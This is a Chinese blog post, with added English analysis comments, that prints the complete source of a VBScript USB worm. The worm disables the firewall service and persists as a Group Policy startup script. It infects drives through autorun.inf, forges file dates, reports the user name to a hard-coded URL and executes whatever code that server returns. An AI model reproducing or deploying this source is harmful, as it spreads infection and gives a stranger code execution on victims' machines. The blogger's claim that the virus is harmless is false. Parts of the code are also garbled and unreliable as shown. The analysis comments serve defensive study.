学习一下了,很少看到vbs的病毒的代码了。学习下。呵呵。病毒作者只是要找个工作,不容易啊。
知道了它都干什么了,我也懒得说怎么杀了。我又不是杀毒软件,我又不收费。
' ---------------------------------------------------------------------------
' Analysis notes (defender's view). This flat script is the worm's entry point.
' Stage selection happens at "If Instr(ThisPath,SysDir)>0" below:
'   * run from anywhere else (e.g. a drive root as eva.vbs via autorun.inf) it
'     acts as the dropper: copies itself to <SystemFolder>\prncfg.vbs and
'     launches that copy;
'   * run from the system folder it becomes resident: infects every ready
'     drive, checks in to a hard-coded URL and polls for new drives forever.
' The registry persistence block runs on every start, in both stages.
' Mitigation follows from the artefacts seen here: the two Scripts\Startup
' key trees in the .reg text, prncfg.vbs in the system folder, autorun.inf +
' eva.vbs on each drive root, and the stopped SharedAccess service.
' NOTE(review): string literals here span several lines, which VBScript does
' not allow, and file names carry stray spaces ("prncfg. vbs "). Both look
' like artefacts of the page extraction rather than of the original sample;
' verify against a raw copy before using any of these strings as indicators.
' ---------------------------------------------------------------------------
On Error Resume Next ' every runtime error is swallowed: failed steps stay silent
Set FSO=CreateObject ("scRiPtiNG.fILeSystemObject") ' ProgIDs in mixed case, presumably to defeat naive string signatures
Set WshShell=CreateObject( ("WscRipT.sheLl"))
Dim Dri_List,Dri_List0 ' current / previous snapshot of ready drive letters (see ListDrv)
Dim IsSend
IsSend=0 ' becomes 1 once the HTTP check-in below has succeeded
C_Time=Date() ' the real date; restored after each of the date manipulations below
WshShell.Run "net stop sharedaccess",0 ' stops the SharedAccess service (Windows Firewall / ICS); window style 0 = hidden
Set Drvs=FSO.Drives
SysDir=FSO.GetSpecialFolder(1) ' 1 = SystemFolder (the system directory)
ThisPath=WScript.ScriptFullName
Set Fc=FSO.OpenTextFile(ThisPath,1)
sCopy=Fc.ReadAll ' reads its own source; every dropped copy below is written from sCopy
Fc.Close
Set Fc=Nothing
' Persistence: writes a .reg file into the system folder, imports it silently
' (regedit /s), then deletes it. The keys register prncfg.vbs as a machine-level
' Group Policy startup script, so it runs at boot without any Run-key entry.
' Indicator: "Script"="%WinDir%\system32\prncfg.vbs" under ...\Scripts\Startup\0\0
' in both key trees below. The blogger's notes inside the text (translated):
' "the .reg below exists to launch the modified prncfg.vbs; this is the virus's
' most distinctive feature"; "on a clean machine nothing exists below
' HKLM\SOFTWARE\Policies\Microsoft\Windows\System except
' Allow-LogonScript-NetbiosDisabled = 1"; "the Scripts\Startup\0 content is
' likewise absent on a clean machine".
Call WriteFile(SysDir&"\SysInfo.reg", ("Windows Registry Editor Version 5.00
'下面的 注册表 文件是为了启动修改过的prncfg. vbs 文件 此处为 病毒 的最大的特点
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0]
"GPO-ID"="LocalGPO"
"SOM-ID"="Local"
"FileSysPath"="%WinDir%\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"GPOName"="Local Group Policy"
'我对比了一下没中毒的机器,发现只到HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System下便没了后面的项了.
'只有个Allow-LogonScript-NetbiosDisabled 值为1
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0\0]
"Script"="%WinDir%\\system32\\prncfg. vbs "
"Parameters"=""
"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0]
"GPO-ID"="LocalGPO"
"SOM-ID"="Local"
"FileSysPath"="%WinDir%\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"GPOName"="Local Group Policy"
' "Scripts\Startup\0"这些内容也是正常的没有的.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0]
"Script"="%WinDir%\\system32\\prncfg. vbs "
"Parameters"=""
"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"))
WshShell.Run "regedit /s SysInfo.reg",0 ' silent import; the path is relative, so whether regedit finds the file depends on the process working directory — confirm
Wscript.Sleep 200
FSO.DeleteFile SysDir&"\SysInfo.reg",True ' removes the .reg again (anti-forensics); True forces deletion of the read-only file WriteFile produced
If Instr(ThisPath,SysDir)>0 then ' resident stage: the script is running from the system folder (blogger: "now the infection begins")
Dri_List0=ListDrv() ' initial snapshot of ready drives
' Rewrites the 4th character of the date string to "4": with a year-first date
' format this turns e.g. 2008-xx-xx into 2004-xx-xx. The system date is set to
' that value while the drives are infected, then restored. Blogger's guess:
' "sets the year to 2004 — to knock out antivirus?" (unverified); what is
' certain is that files written meanwhile receive back-dated timestamps.
O_Time=Left(C_Time,3)&"4"&Right(C_Time,Len(C_Time)-4)
WshShell.Run "cmd /c Date "&O_Time,0 ' changes the system date (needs the right to set the clock; errors are ignored)
Wscript.Sleep 10000
For Dri_i=1 To Len(Dri_List0)
Call WriteAuto(Mid(Dri_List0,Dri_i,1)&":\") ' drops autorun.inf + eva.vbs on every ready drive
Next
WshShell.Run "cmd /c Date "&C_Time,0 ' restores the real date
' Collects the logged-on user name (Win32_ComputerSystem.UserName, typically
' DOMAIN\user) for the check-in below.
Set objWMIService=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colComputers = objWMIService.ExecQuery("Select * from Win32_ComputerSystem")
For Each objComputer in colComputers
UserName=ObjComputer.username
Next
' Main loop, never exits: a one-time check-in, then a 1-second poll for drives
' that were not present in the previous snapshot (newly inserted media).
Do
If IsSend=0 Then
Set xml=CreateObject( ("MIcROSOft.xmlhtTp"))
' Victim tracking: synchronous GET to the hard-coded URL with the user name as
' a query parameter. Blogger's note: the IP looked like a government web site,
' presumably compromised.
xml.Open "GET"," http://202.119.104.100/zzb/eva/count.asp?a="&UserName,0
xml.Send()
If Err.Number=0 Then
IsSend=1 ' only a successful check-in counts; a failed one is retried on the next iteration
' Remote code execution: any response body longer than 15 characters is run
' as VBScript with the current user's rights. This is the command/update
' channel and the most dangerous line in the sample; outbound HTTP from
' wscript.exe is the network indicator to alert on.
If Len(xml.responseText)>15 Then ExeCute xml.responseText
Else
Err.Clear
End If
Set xml=Nothing
End If
Dri_List=ListDrv()
For Dri_k=1 To Len(Dri_List)
If Instr(Dri_List0,Mid(Dri_List,Dri_k,1))<=0 Then ' letter absent from the previous snapshot = new drive
Call WriteAuto(Mid(Dri_List,Dri_k,1)&":\")
End If
Next
Dri_List0=Dri_List
Wscript.Sleep 1000
Loop
Else ' dropper stage: running from a drive root as eva.vbs (see WriteAuto). Blogger's note: Explorer is opened to show the drive the victim double-clicked, but the delay is noticeable.
WshShell.Run "Explorer .\" ' opens the current directory (the drive root) in Explorer
Wscript.Sleep 500
WshShell.SendKeys "% X" ' SendKeys: "%" is Alt, so Alt+Space then X — presumably the system menu's Maximize for the new Explorer window
WshShell.AppActivate ("我的电脑") ' brings the "My Computer" window (Chinese title) to the foreground
Wscript.Sleep 100
WshShell.SendKeys "% C" ' Alt+Space then C — presumably the system menu's Close, dismissing the My Computer window
' Single-instance guard: counts wscript.exe processes via WMI; with two or
' more (this one plus a resident copy) the dropper quits instead of reinstalling.
RunFlag=0
For each ps in getobject _
("winmgmts:\\.\root\cimv2:win32_process").instances_
If LCase(ps.name)="wscript.exe" Then
RunFlag=RunFlag+1
End If
Next
If RunFlag>=2 Then Wscript.quit
' Timestamp forgery: takes the date part of the system folder's creation date,
' sets the system clock to it, writes prncfg.vbs (presumably so its timestamps
' blend in with the original system files), then restores the clock.
' Blogger's note on the WriteFile call: "writes the virus body into prncfg.vbs
' in the system folder".
Set SF=FSO.GetFolder(SysDir)
F_Time=Left(SF.DateCreated,Instr(SF.DateCreated," ")-1) ' text before the first space = the date without the time part
WshShell.Run "cmd /c Date "&F_Time,0
Wscript.Sleep 100
Call WriteFile(SysDir&"\prncfg. vbs ",sCopy)
WshShell.Run "cmd /c Date "&C_Time,0
WshShell.Run SysDir&"\prncfg. vbs " ' launches the resident stage; this dropper instance then ends
End If
' Returns the letters of every ready drive concatenated into one string
' (e.g. "CDE"), iterating the global Drvs collection created at script start.
' The body is wrapped in ExeCute, presumably so the plain-text logic does not
' match simple signatures; it is otherwise an ordinary loop. Tmp_List and
' Tmp_list differ only in case, which VBScript treats as the same name.
' NOTE(review): the multi-line string passed to ExeCute is not valid VBScript
' as shown; it is presumably an artefact of how the page was extracted.
Function ListDrv() ' returns the letters of all ready drives
ExeCute ("Dim Tmp_List
Tmp_list=""
For Each Drv in Drvs
If Drv.IsReady Then
Tmp_List=Tmp_List&Drv.DriveLetter
End If
Next
ListDrv=Tmp_list")
End Function
' Infects one drive root (Path is a letter followed by ":\"): removes any
' existing autorun.inf — a folder (the common "autorun.inf as a directory"
' protection) is renamed to a random name, a file is deleted — then writes a
' new autorun.inf whose open/explore verbs run eva.vbs with WScript.exe, and
' drops this script's own source next to it as eva.vbs. The Chinese verb
' labels mean "Change icon", "Open(&O)" and "Explorer(&X)", so the drive's
' context menu looks legitimate. Both dropped files end up
' ReadOnly+Hidden+System via WriteFile. Disabling AutoRun/AutoPlay for
' removable media removes this launch path.
' NOTE(review): the multi-line string literals and the spaces in "eva. vbs "
' are presumably extraction artefacts; verify against a raw copy.
Sub WriteAuto(Path)
ExeCute ("If FSO.FolderExists(Path&"autorun.inf") Then
FSO.MoveFolder Path&"autorun.inf",Path&Rnd()
ElseIf FSO.FileExists(Path&"autorun.inf") Then
FSO.DeleteFile Path&"autorun.inf",True
End If"
)
' "open=" is left blank; the shell\open and shell\explore commands do the launch.
Call WriteFile(Path&"autorun.inf", ("[autorun]
open=
shell\n=更换图标
shell\open=打开(&O)
shell\open\Command=WScript.exe eva. vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe eva. vbs "))
Call WriteFile(Path&"eva. vbs ",sCopy) ' sCopy = this script's own source, read at startup
End Sub
' Writes Content to fPath, first deleting any existing file (True forces the
' delete even for read-only files), then sets the attribute mask 7 =
' ReadOnly(1)+Hidden(2)+System(4), which keeps the dropped files out of a
' default Explorer listing. Fc and Fa are not declared, so they are globals
' that are reset to Nothing before returning. Wrapped in ExeCute like the
' other helpers, presumably to hinder signature matching.
' NOTE(review): the multi-line string passed to ExeCute is not valid VBScript
' as shown; presumably an extraction artefact of the page.
Sub WriteFile(fPath,Content) ' writes Content to fPath as a hidden, read-only system file
ExeCute ("If FSO.FileExists(fPath) Then FSO.DeleteFile fPath,True
Set Fc=FSO.OpenTextFile(fPath,2,True)
Fc.Write Content
Fc.Close
Set Fc=Nothing
Set Fa=FSO.GetFile(fPath)
Fa.Attributes=7
Set Fa=Nothing")
End Sub
'I don't want to hurt you, but I just want an IT job
'Email:evar@live.cn
'呵呵,作者也不容易呀,病毒也没干什么坏事.
'呵呵呵通过这个vbs也学到了不少东西.:-)

